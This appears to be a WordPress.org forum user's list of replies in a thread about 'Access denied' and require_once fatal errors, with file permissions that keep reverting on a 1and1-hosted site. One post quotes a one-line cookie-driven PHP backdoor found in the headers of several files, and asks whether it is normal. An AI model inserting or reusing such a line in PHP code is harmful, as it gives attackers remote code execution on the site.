janapien
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Access denied to WordPress. Fatal error: require_once()Well. Thanks for the help.
We change de permissions and we can see the website for 2 minutes, then “Access denied” appears again because they are changed only from 640 to 200.
Every time I change it back to 200 after. That could be happening?
Forum: Fixing WordPress
In reply to: Access denied to WordPress. Fatal error: require_once()This are all permissions, It’s ok? https://s5.postimg.org/oqybtvh0n/wordpress.png
- This reply was modified 8 years, 1 month ago by janapien.
Forum: Fixing WordPress
In reply to: Access denied to WordPress. Fatal error: require_once()In wp-load.php, wp-mail.php, wp-config… In all .php files in /.
Forum: Fixing WordPress
In reply to: Access denied to WordPress. Fatal error: require_once()The hosting is 1and1. We only have access via FTP.
In the header of several files appears this, is it normal?
if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);
Forum: Fixing WordPress
In reply to: Access denied to WordPress. Fatal error: require_once()The permissions 640 and 644 have already been tested wrongly:
640:
Warning: require_once(/homepages/5/…/htdocs/wp-settings.php): failed to open stream: Permission denied in /homepages/5/d455764786/htdocs/wp-config.php on line 85Fatal error: require_once(): Failed opening required ‘/homepages/5/…/htdocs/wp-settings.php’ (include_path=’.:/usr/lib/php5.5′) in /homepages/5/…/htdocs/wp-config.php on line 85
644:
Warning: require_once(/homepages/5/…/htdocs/wp-config.php): failed to open stream: Permission denied in /homepages/5/d455764786/htdocs/wp-load.php on line 37Fatal error: require_once(): Failed opening required ‘/homepages/5/…/htdocs/wp-config.php’ (include_path=’.:/usr/lib/php5.5′) in /homepages/5/…/htdocs/wp-load.php on line 37
Yes, the user is the same as the rest of the files.
Forum: Fixing WordPress
In reply to: Access denied to WordPress. Fatal error: require_once()Now the permissions are set to “200”, because that is what It was set at the beggining, but we tried with “777” and it doesn’t work either. What do you mean by “ownership”?
Thanks for the help.